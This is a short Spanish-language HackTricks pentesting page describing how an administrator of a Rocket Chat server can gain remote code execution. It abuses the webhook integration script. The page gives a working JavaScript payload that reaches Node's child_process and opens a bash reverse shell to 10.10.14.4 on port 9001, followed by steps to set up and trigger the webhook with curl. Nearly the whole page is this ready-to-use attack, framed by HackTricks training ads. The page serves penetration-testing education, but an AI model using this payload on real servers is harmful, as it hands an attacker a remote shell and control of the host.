Rocket Chat
Reading time: 2 minutes
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.
RCE
Si eres administrador dentro de Rocket Chat, puedes obtener RCE.
- Ve a
Integrations
y seleccionaNew Integration
y elige cualquiera:Incoming WebHook
oOutgoing WebHook
. /admin/integrations/incoming
.png)
- Según la docs, ambos utilizan ES2015 / ECMAScript 6 (básicamente JavaScript) para procesar los datos. Así que obtengamos un rev shell para javascript como:
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Configura el WebHook (el canal y la publicación como nombre de usuario deben existir):
.png)
- Configura el script del WebHook:
.png)
- Guarda los cambios
- Obtén la URL del WebHook generada:
.png)
- Llama a la URL con curl y deberías recibir el rev shell
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripción!
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.